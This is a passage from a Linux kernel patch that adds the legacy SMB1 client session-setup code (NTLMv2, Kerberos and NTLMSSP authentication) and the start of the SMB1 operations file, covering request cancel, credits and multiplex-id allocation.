++	case CIFS_NEGFLAVOR_EXTENDED:
++		switch (requested) {
++		case Kerberos:
++		case RawNTLMSSP:
++			return requested;
++		case Unspecified:
++			if (server->sec_ntlmssp &&
++			    (global_secflags & CIFSSEC_MAY_NTLMSSP))
++				return RawNTLMSSP;
++			if ((server->sec_kerberos || server->sec_mskerberos) &&
++			    (global_secflags & CIFSSEC_MAY_KRB5))
++				return Kerberos;
++			fallthrough;
++		default:
++			return Unspecified;
++		}
++	case CIFS_NEGFLAVOR_UNENCAP:
++		switch (requested) {
++		case NTLMv2:
++			return requested;
++		case Unspecified:
++			if (global_secflags & CIFSSEC_MAY_NTLMV2)
++				return NTLMv2;
++			break;
++		default:
++			break;
++		}
++		fallthrough;
++	default:
++		return Unspecified;
++	}
++}
++
++struct sess_data {
++	unsigned int xid;
++	struct cifs_ses *ses;
++	struct TCP_Server_Info *server;
++	struct nls_table *nls_cp;
++	void (*func)(struct sess_data *);
++	int result;
++
++	/* we will send the SMB in three pieces:
++	 * a fixed length beginning part, an optional
++	 * SPNEGO blob (which can be zero length), and a
++	 * last part which will include the strings
++	 * and rest of bcc area. This allows us to avoid
++	 * a large buffer 17K allocation
++	 */
++	int buf0_type;
++	struct kvec iov[3];
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++sess_alloc_buffer(struct sess_data *sess_data, int wct)
++{
++	int rc;
++	struct cifs_ses *ses = sess_data->ses;
++	struct smb_hdr *smb_buf;
++
++	rc = small_smb_init_no_tc(SMB_COM_SESSION_SETUP_ANDX, wct, ses,
++				  (void **)&smb_buf);
++
++	if (rc)
++		return rc;
++
++	sess_data->iov[0].iov_base = (char *)smb_buf;
++	sess_data->iov[0].iov_len = be32_to_cpu(smb_buf->smb_buf_length) + 4;
++	/*
++	 * This variable will be used to clear the buffer
++	 * allocated above in case of any error in the calling function.
++	 */
++	sess_data->buf0_type = CIFS_SMALL_BUFFER;
++
++	/* 2000 big enough to fit max user, domain, NOS name etc. */
++	sess_data->iov[2].iov_base = kmalloc(2000, GFP_KERNEL);
++	if (!sess_data->iov[2].iov_base) {
++		rc = -ENOMEM;
++		goto out_free_smb_buf;
++	}
++
++	return 0;
++
++out_free_smb_buf:
++	cifs_small_buf_release(smb_buf);
++	sess_data->iov[0].iov_base = NULL;
++	sess_data->iov[0].iov_len = 0;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	return rc;
++}
++
++static void
++sess_free_buffer(struct sess_data *sess_data)
++{
++	struct kvec *iov = sess_data->iov;
++
++	/*
++	 * Zero the session data before freeing, as it might contain sensitive info (keys, etc).
++	 * Note that iov[1] is already freed by caller.
++	 */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER && iov[0].iov_base)
++		memzero_explicit(iov[0].iov_base, iov[0].iov_len);
++
++	free_rsp_buf(sess_data->buf0_type, iov[0].iov_base);
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	kfree_sensitive(iov[2].iov_base);
++}
++
++static int
++sess_establish_session(struct sess_data *sess_data)
++{
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	cifs_server_lock(server);
++	if (!server->session_estab) {
++		if (server->sign) {
++			server->session_key.response =
++				kmemdup(ses->auth_key.response,
++				ses->auth_key.len, GFP_KERNEL);
++			if (!server->session_key.response) {
++				cifs_server_unlock(server);
++				return -ENOMEM;
++			}
++			server->session_key.len =
++						ses->auth_key.len;
++		}
++		server->sequence_number = 0x2;
++		server->session_estab = true;
++	}
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "CIFS session established successfully\n");
++	return 0;
++}
++
++static int
++sess_sendreceive(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf = (struct smb_hdr *) sess_data->iov[0].iov_base;
++	__u16 count;
++	struct kvec rsp_iov = { NULL, 0 };
++
++	count = sess_data->iov[1].iov_len + sess_data->iov[2].iov_len;
++	be32_add_cpu(&smb_buf->smb_buf_length, count);
++	put_bcc(count, smb_buf);
++
++	rc = SendReceive2(sess_data->xid, sess_data->ses,
++			  sess_data->iov, 3 /* num_iovecs */,
++			  &sess_data->buf0_type,
++			  CIFS_LOG_ERROR, &rsp_iov);
++	cifs_small_buf_release(sess_data->iov[0].iov_base);
++	memcpy(&sess_data->iov[0], &rsp_iov, sizeof(struct kvec));
++
++	return rc;
++}
++
++static void
++sess_auth_ntlmv2(struct sess_data *sess_data)
++{
++	int rc = 0;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	char *bcc_ptr;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	__u16 bytes_remaining;
++
++	/* old style NTLM sessionsetup */
++	/* wct = 13 */
++	rc = sess_alloc_buffer(sess_data, 13);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	bcc_ptr = sess_data->iov[2].iov_base;
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++
++	pSMB->req_no_secext.Capabilities = cpu_to_le32(capabilities);
++
++	/* LM2 password would be here if we supported it */
++	pSMB->req_no_secext.CaseInsensitivePasswordLength = 0;
++
++	if (ses->user_name != NULL) {
++		/* calculate nlmv2 response and session key */
++		rc = setup_ntlmv2_rsp(ses, sess_data->nls_cp);
++		if (rc) {
++			cifs_dbg(VFS, "Error %d during NTLMv2 authentication\n", rc);
++			goto out;
++		}
++
++		memcpy(bcc_ptr, ses->auth_key.response + CIFS_SESS_KEY_SIZE,
++				ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++		bcc_ptr += ses->auth_key.len - CIFS_SESS_KEY_SIZE;
++
++		/* set case sensitive password length after tilen may get
++		 * assigned, tilen is 0 otherwise.
++		 */
++		pSMB->req_no_secext.CaseSensitivePasswordLength =
++			cpu_to_le16(ses->auth_key.len - CIFS_SESS_KEY_SIZE);
++	} else {
++		pSMB->req_no_secext.CaseSensitivePasswordLength = 0;
++	}
++
++	if (ses->capabilities & CAP_UNICODE) {
++		if (!IS_ALIGNED(sess_data->iov[0].iov_len, 2)) {
++			*bcc_ptr = 0;
++			bcc_ptr++;
++		}
++		unicode_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	} else {
++		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	}
++
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++			(long) sess_data->iov[2].iov_base;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	if (smb_buf->WordCount != 3) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++	rc = sess_establish_session(sess_data);
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	sess_free_buffer(sess_data);
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++}
++
++#ifdef CONFIG_CIFS_UPCALL
++static void
++sess_auth_kerberos(struct sess_data *sess_data)
++{
++	int rc = 0;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	char *bcc_ptr;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	__u16 bytes_remaining;
++	struct key *spnego_key = NULL;
++	struct cifs_spnego_msg *msg;
++	u16 blob_len;
++
++	/* extended security */
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	bcc_ptr = sess_data->iov[2].iov_base;
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++
++	spnego_key = cifs_get_spnego_key(ses, server);
++	if (IS_ERR(spnego_key)) {
++		rc = PTR_ERR(spnego_key);
++		spnego_key = NULL;
++		goto out;
++	}
++
++	msg = spnego_key->payload.data[0];
++	/*
++	 * check version field to make sure that cifs.upcall is
++	 * sending us a response in an expected form
++	 */
++	if (msg->version != CIFS_SPNEGO_UPCALL_VERSION) {
++		cifs_dbg(VFS, "incorrect version of cifs.upcall (expected %d but got %d)\n",
++			 CIFS_SPNEGO_UPCALL_VERSION, msg->version);
++		rc = -EKEYREJECTED;
++		goto out_put_spnego_key;
++	}
++
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
++					 GFP_KERNEL);
++	if (!ses->auth_key.response) {
++		cifs_dbg(VFS, "Kerberos can't allocate (%u bytes) memory\n",
++			 msg->sesskey_len);
++		rc = -ENOMEM;
++		goto out_put_spnego_key;
++	}
++	ses->auth_key.len = msg->sesskey_len;
++
++	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	capabilities |= CAP_EXTENDED_SECURITY;
++	pSMB->req.Capabilities = cpu_to_le32(capabilities);
++	sess_data->iov[1].iov_base = msg->data + msg->sesskey_len;
++	sess_data->iov[1].iov_len = msg->secblob_len;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(sess_data->iov[1].iov_len);
++
++	if (ses->capabilities & CAP_UNICODE) {
++		/* unicode strings must be word aligned */
++		if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
++			*bcc_ptr = 0;
++			bcc_ptr++;
++		}
++		unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
++		unicode_domain_string(&bcc_ptr, ses, sess_data->nls_cp);
++	} else {
++		/* BB: is this right? */
++		ascii_ssetup_strings(&bcc_ptr, ses, sess_data->nls_cp);
++	}
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++			(long) sess_data->iov[2].iov_base;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out_put_spnego_key;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_put_spnego_key;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_put_spnego_key;
++	}
++	bcc_ptr += blob_len;
++	bytes_remaining -= blob_len;
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++	rc = sess_establish_session(sess_data);
++out_put_spnego_key:
++	key_invalidate(spnego_key);
++	key_put(spnego_key);
++out:
++	sess_data->result = rc;
++	sess_data->func = NULL;
++	sess_free_buffer(sess_data);
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++}
++
++#endif /* ! CONFIG_CIFS_UPCALL */
++
++/*
++ * The required kvec buffers have to be allocated before calling this
++ * function.
++ */
++static int
++_sess_auth_rawntlmssp_assemble_req(struct sess_data *sess_data)
++{
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u32 capabilities;
++	char *bcc_ptr;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++
++	capabilities = cifs_ssetup_hdr(ses, server, pSMB);
++	if ((pSMB->req.hdr.Flags2 & SMBFLG2_UNICODE) == 0) {
++		cifs_dbg(VFS, "NTLMSSP requires Unicode support\n");
++		return -ENOSYS;
++	}
++
++	pSMB->req.hdr.Flags2 |= SMBFLG2_EXT_SEC;
++	capabilities |= CAP_EXTENDED_SECURITY;
++	pSMB->req.Capabilities |= cpu_to_le32(capabilities);
++
++	bcc_ptr = sess_data->iov[2].iov_base;
++	/* unicode strings must be word aligned */
++	if (!IS_ALIGNED(sess_data->iov[0].iov_len + sess_data->iov[1].iov_len, 2)) {
++		*bcc_ptr = 0;
++		bcc_ptr++;
++	}
++	unicode_oslm_strings(&bcc_ptr, sess_data->nls_cp);
++
++	sess_data->iov[2].iov_len = (long) bcc_ptr -
++					(long) sess_data->iov[2].iov_base;
++
++	return 0;
++}
++
++static void
++sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data);
++
++static void
++sess_auth_rawntlmssp_negotiate(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u16 bytes_remaining;
++	char *bcc_ptr;
++	unsigned char *ntlmsspblob = NULL;
++	u16 blob_len;
++
++	cifs_dbg(FYI, "rawntlmssp session setup negotiate phase\n");
++
++	/*
++	 * if memory allocation is successful, caller of this function
++	 * frees it.
++	 */
++	ses->ntlmssp = kmalloc(sizeof(struct ntlmssp_auth), GFP_KERNEL);
++	if (!ses->ntlmssp) {
++		rc = -ENOMEM;
++		goto out;
++	}
++	ses->ntlmssp->sesskey_per_smbsess = false;
++
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++
++	/* Build security blob before we assemble the request */
++	rc = build_ntlmssp_negotiate_blob(&ntlmsspblob,
++				     &blob_len, ses, server,
++				     sess_data->nls_cp);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	sess_data->iov[1].iov_len = blob_len;
++	sess_data->iov[1].iov_base = ntlmsspblob;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
++
++	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	rc = sess_sendreceive(sess_data);
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++
++	/* If true, rc here is expected and not an error */
++	if (sess_data->buf0_type != CIFS_NO_BUFFER &&
++	    smb_buf->Status.CifsError ==
++			cpu_to_le32(NT_STATUS_MORE_PROCESSING_REQUIRED))
++		rc = 0;
++
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	cifs_dbg(FYI, "rawntlmssp session setup challenge phase\n");
++
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_free_ntlmsspblob;
++	}
++
++	ses->Suid = smb_buf->Uid;   /* UID left in wire format (le) */
++	cifs_dbg(FYI, "UID = %llu\n", ses->Suid);
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_free_ntlmsspblob;
++	}
++
++	rc = decode_ntlmssp_challenge(bcc_ptr, blob_len, ses);
++
++out_free_ntlmsspblob:
++	kfree_sensitive(ntlmsspblob);
++out:
++	sess_free_buffer(sess_data);
++
++	if (!rc) {
++		sess_data->func = sess_auth_rawntlmssp_authenticate;
++		return;
++	}
++
++	/* Else error. Cleanup */
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++
++	sess_data->func = NULL;
++	sess_data->result = rc;
++}
++
++static void
++sess_auth_rawntlmssp_authenticate(struct sess_data *sess_data)
++{
++	int rc;
++	struct smb_hdr *smb_buf;
++	SESSION_SETUP_ANDX *pSMB;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++	__u16 bytes_remaining;
++	char *bcc_ptr;
++	unsigned char *ntlmsspblob = NULL;
++	u16 blob_len;
++
++	cifs_dbg(FYI, "rawntlmssp session setup authenticate phase\n");
++
++	/* wct = 12 */
++	rc = sess_alloc_buffer(sess_data, 12);
++	if (rc)
++		goto out;
++
++	/* Build security blob before we assemble the request */
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)pSMB;
++	rc = build_ntlmssp_auth_blob(&ntlmsspblob,
++					&blob_len, ses, server,
++					sess_data->nls_cp);
++	if (rc)
++		goto out_free_ntlmsspblob;
++	sess_data->iov[1].iov_len = blob_len;
++	sess_data->iov[1].iov_base = ntlmsspblob;
++	pSMB->req.SecurityBlobLength = cpu_to_le16(blob_len);
++	/*
++	 * Make sure that we tell the server that we are using
++	 * the uid that it just gave us back on the response
++	 * (challenge)
++	 */
++	smb_buf->Uid = ses->Suid;
++
++	rc = _sess_auth_rawntlmssp_assemble_req(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	rc = sess_sendreceive(sess_data);
++	if (rc)
++		goto out_free_ntlmsspblob;
++
++	pSMB = (SESSION_SETUP_ANDX *)sess_data->iov[0].iov_base;
++	smb_buf = (struct smb_hdr *)sess_data->iov[0].iov_base;
++	if (smb_buf->WordCount != 4) {
++		rc = -EIO;
++		cifs_dbg(VFS, "bad word count %d\n", smb_buf->WordCount);
++		goto out_free_ntlmsspblob;
++	}
++
++	if (le16_to_cpu(pSMB->resp.Action) & GUEST_LOGIN)
++		cifs_dbg(FYI, "Guest login\n"); /* BB mark SesInfo struct? */
++
++	if (ses->Suid != smb_buf->Uid) {
++		ses->Suid = smb_buf->Uid;
++		cifs_dbg(FYI, "UID changed! new UID = %llu\n", ses->Suid);
++	}
++
++	bytes_remaining = get_bcc(smb_buf);
++	bcc_ptr = pByteArea(smb_buf);
++	blob_len = le16_to_cpu(pSMB->resp.SecurityBlobLength);
++	if (blob_len > bytes_remaining) {
++		cifs_dbg(VFS, "bad security blob length %d\n",
++				blob_len);
++		rc = -EINVAL;
++		goto out_free_ntlmsspblob;
++	}
++	bcc_ptr += blob_len;
++	bytes_remaining -= blob_len;
++
++
++	/* BB check if Unicode and decode strings */
++	if (bytes_remaining == 0) {
++		/* no string area to decode, do nothing */
++	} else if (smb_buf->Flags2 & SMBFLG2_UNICODE) {
++		/* unicode string area must be word-aligned */
++		if (!IS_ALIGNED((unsigned long)bcc_ptr - (unsigned long)smb_buf, 2)) {
++			++bcc_ptr;
++			--bytes_remaining;
++		}
++		decode_unicode_ssetup(&bcc_ptr, bytes_remaining, ses,
++				      sess_data->nls_cp);
++	} else {
++		decode_ascii_ssetup(&bcc_ptr, bytes_remaining, ses,
++				    sess_data->nls_cp);
++	}
++
++out_free_ntlmsspblob:
++	kfree_sensitive(ntlmsspblob);
++out:
++	sess_free_buffer(sess_data);
++
++	if (!rc)
++		rc = sess_establish_session(sess_data);
++
++	/* Cleanup */
++	kfree_sensitive(ses->auth_key.response);
++	ses->auth_key.response = NULL;
++	kfree_sensitive(ses->ntlmssp);
++	ses->ntlmssp = NULL;
++
++	sess_data->func = NULL;
++	sess_data->result = rc;
++}
++
++static int select_sec(struct sess_data *sess_data)
++{
++	int type;
++	struct cifs_ses *ses = sess_data->ses;
++	struct TCP_Server_Info *server = sess_data->server;
++
++	type = cifs_select_sectype(server, ses->sectype);
++	cifs_dbg(FYI, "sess setup type %d\n", type);
++	if (type == Unspecified) {
++		cifs_dbg(VFS, "Unable to select appropriate authentication method!\n");
++		return -EINVAL;
++	}
++
++	switch (type) {
++	case NTLMv2:
++		sess_data->func = sess_auth_ntlmv2;
++		break;
++	case Kerberos:
++#ifdef CONFIG_CIFS_UPCALL
++		sess_data->func = sess_auth_kerberos;
++		break;
++#else
++		cifs_dbg(VFS, "Kerberos negotiated but upcall support disabled!\n");
++		return -ENOSYS;
++#endif /* CONFIG_CIFS_UPCALL */
++	case RawNTLMSSP:
++		sess_data->func = sess_auth_rawntlmssp_negotiate;
++		break;
++	default:
++		cifs_dbg(VFS, "secType %d not supported!\n", type);
++		return -ENOSYS;
++	}
++
++	return 0;
++}
++
++int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
++		   struct TCP_Server_Info *server,
++		   const struct nls_table *nls_cp)
++{
++	int rc = 0;
++	struct sess_data *sess_data;
++
++	if (ses == NULL) {
++		WARN(1, "%s: ses == NULL!", __func__);
++		return -EINVAL;
++	}
++
++	sess_data = kzalloc(sizeof(struct sess_data), GFP_KERNEL);
++	if (!sess_data)
++		return -ENOMEM;
++
++	sess_data->xid = xid;
++	sess_data->ses = ses;
++	sess_data->server = server;
++	sess_data->buf0_type = CIFS_NO_BUFFER;
++	sess_data->nls_cp = (struct nls_table *) nls_cp;
++
++	rc = select_sec(sess_data);
++	if (rc)
++		goto out;
++
++	while (sess_data->func)
++		sess_data->func(sess_data);
++
++	/* Store result before we free sess_data */
++	rc = sess_data->result;
++
++out:
++	kfree_sensitive(sess_data);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+diff --git a/fs/smb/client/smb1ops.c b/fs/smb/client/smb1ops.c
+new file mode 100644
+index 0000000000000..7d1b3fc014d94
+--- /dev/null
++++ b/fs/smb/client/smb1ops.c
+@@ -0,0 +1,1276 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ *  SMB1 (CIFS) version specific operations
++ *
++ *  Copyright (c) 2012, Jeff Layton <jlayton@redhat.com>
++ */
++
++#include <linux/pagemap.h>
++#include <linux/vfs.h>
++#include <uapi/linux/magic.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifspdu.h"
++#include "cifs_unicode.h"
++#include "fs_context.h"
++
++/*
++ * An NT cancel request header looks just like the original request except:
++ *
++ * The Command is SMB_COM_NT_CANCEL
++ * The WordCount is zeroed out
++ * The ByteCount is zeroed out
++ *
++ * This function mangles an existing request buffer into a
++ * SMB_COM_NT_CANCEL request and then sends it.
++ */
++static int
++send_nt_cancel(struct TCP_Server_Info *server, struct smb_rqst *rqst,
++	       struct mid_q_entry *mid)
++{
++	int rc = 0;
++	struct smb_hdr *in_buf = (struct smb_hdr *)rqst->rq_iov[0].iov_base;
++
++	/* -4 for RFC1001 length and +2 for BCC field */
++	in_buf->smb_buf_length = cpu_to_be32(sizeof(struct smb_hdr) - 4  + 2);
++	in_buf->Command = SMB_COM_NT_CANCEL;
++	in_buf->WordCount = 0;
++	put_bcc(0, in_buf);
++
++	cifs_server_lock(server);
++	rc = cifs_sign_smb(in_buf, server, &mid->sequence_number);
++	if (rc) {
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	/*
++	 * The response to this call was already factored into the sequence
++	 * number when the call went out, so we must adjust it back downward
++	 * after signing here.
++	 */
++	--server->sequence_number;
++	rc = smb_send(server, in_buf, be32_to_cpu(in_buf->smb_buf_length));
++	if (rc < 0)
++		server->sequence_number--;
++
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "issued NT_CANCEL for mid %u, rc = %d\n",
++		 get_mid(in_buf), rc);
++
++	return rc;
++}
++
++static bool
++cifs_compare_fids(struct cifsFileInfo *ob1, struct cifsFileInfo *ob2)
++{
++	return ob1->fid.netfid == ob2->fid.netfid;
++}
++
++static unsigned int
++cifs_read_data_offset(char *buf)
++{
++	READ_RSP *rsp = (READ_RSP *)buf;
++	return le16_to_cpu(rsp->DataOffset);
++}
++
++static unsigned int
++cifs_read_data_length(char *buf, bool in_remaining)
++{
++	READ_RSP *rsp = (READ_RSP *)buf;
++	/* It's a bug reading remaining data for SMB1 packets */
++	WARN_ON(in_remaining);
++	return (le16_to_cpu(rsp->DataLengthHigh) << 16) +
++	       le16_to_cpu(rsp->DataLength);
++}
++
++static struct mid_q_entry *
++cifs_find_mid(struct TCP_Server_Info *server, char *buffer)
++{
++	struct smb_hdr *buf = (struct smb_hdr *)buffer;
++	struct mid_q_entry *mid;
++
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
++		if (compare_mid(mid->mid, buf) &&
++		    mid->mid_state == MID_REQUEST_SUBMITTED &&
++		    le16_to_cpu(mid->command) == buf->Command) {
++			kref_get(&mid->refcount);
++			spin_unlock(&server->mid_lock);
++			return mid;
++		}
++	}
++	spin_unlock(&server->mid_lock);
++	return NULL;
++}
++
++static void
++cifs_add_credits(struct TCP_Server_Info *server,
++		 const struct cifs_credits *credits, const int optype)
++{
++	spin_lock(&server->req_lock);
++	server->credits += credits->value;
++	server->in_flight--;
++	spin_unlock(&server->req_lock);
++	wake_up(&server->request_q);
++}
++
++static void
++cifs_set_credits(struct TCP_Server_Info *server, const int val)
++{
++	spin_lock(&server->req_lock);
++	server->credits = val;
++	server->oplocks = val > 1 ? enable_oplocks : false;
++	spin_unlock(&server->req_lock);
++}
++
++static int *
++cifs_get_credits_field(struct TCP_Server_Info *server, const int optype)
++{
++	return &server->credits;
++}
++
++static unsigned int
++cifs_get_credits(struct mid_q_entry *mid)
++{
++	return 1;
++}
++
++/*
++ * Find a free multiplex id (SMB mid). Otherwise there could be
++ * mid collisions which might cause problems, demultiplexing the
++ * wrong response to this request. Multiplex ids could collide if
++ * one of a series requests takes much longer than the others, or
++ * if a very large number of long lived requests (byte range
++ * locks or FindNotify requests) are pending. No more than
++ * 64K-1 requests can be outstanding at one time. If no
++ * mids are available, return zero. A future optimization
++ * could make the combination of mids and uid the key we use
++ * to demultiplex on (rather than mid alone).
++ * In addition to the above check, the cifs demultiplex
++ * code already used the command code as a secondary
++ * check of the frame and if signing is negotiated the
++ * response would be discarded if the mid were the same
++ * but the signature was wrong. Since the mid is not put in the
++ * pending queue until later (when it is about to be dispatched)
++ * we do have to limit the number of outstanding requests
++ * to somewhat less than 64K-1 although it is hard to imagine
++ * so many threads being in the vfs at one time.
++ */
++static __u64
++cifs_get_next_mid(struct TCP_Server_Info *server)
++{
++	__u64 mid = 0;
++	__u16 last_mid, cur_mid;
++	bool collision, reconnect = false;
++
++	spin_lock(&server->mid_lock);
++
++	/* mid is 16 bit only for CIFS/SMB */
++	cur_mid = (__u16)((server->CurrentMid) & 0xffff);
++	/* we do not want to loop forever */
++	last_mid = cur_mid;
++	cur_mid++;
++	/* avoid 0xFFFF MID */
++	if (cur_mid == 0xffff)
++		cur_mid++;
++
++	/*
++	 * This nested loop looks more expensive than it is.
++	 * In practice the list of pending requests is short,
++	 * fewer than 50, and the mids are likely to be unique
++	 * on the first pass through the loop unless some request
++	 * takes longer than the 64 thousand requests before it
++	 * (and it would also have to have been a request that
++	 * did not time out).
++	 */
++	while (cur_mid != last_mid) {
++		struct mid_q_entry *mid_entry;
++		unsigned int num_mids;
++
++		collision = false;
++		if (cur_mid == 0)
++			cur_mid++;
++
++		num_mids = 0;
++		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
++			++num_mids;
++			if (mid_entry->mid == cur_mid &&
++			    mid_entry->mid_state == MID_REQUEST_SUBMITTED) {
++				/* This mid is in use, try a different one */
++				collision = true;
++				break;
++			}
++		}
++
++		/*
++		 * if we have more than 32k mids in the list, then something
++		 * is very wrong. Possibly a local user is trying to DoS the
++		 * box by issuing long-running calls and SIGKILL'ing them. If
++		 * we get to 2^16 mids then we're in big trouble as this
++		 * function could loop forever.
++		 *
++		 * Go ahead and assign out the mid in this situation, but force
++		 * an eventual reconnect to clean out the pending_mid_q.
++		 */
++		if (num_mids > 32768)
++			reconnect = true;
++
++		if (!collision) {
++			mid = (__u64)cur_mid;
++			server->CurrentMid = mid;
++			break;
++		}
++		cur_mid++;
++	}
++	spin_unlock(&server->mid_lock);
++
++	if (reconnect) {
++		cifs_signal_cifsd_for_reconnect(server, false);
++	}
++
++	return mid;
++}
++
++/*
++	return codes:
++		0	not a transact2, or all data present
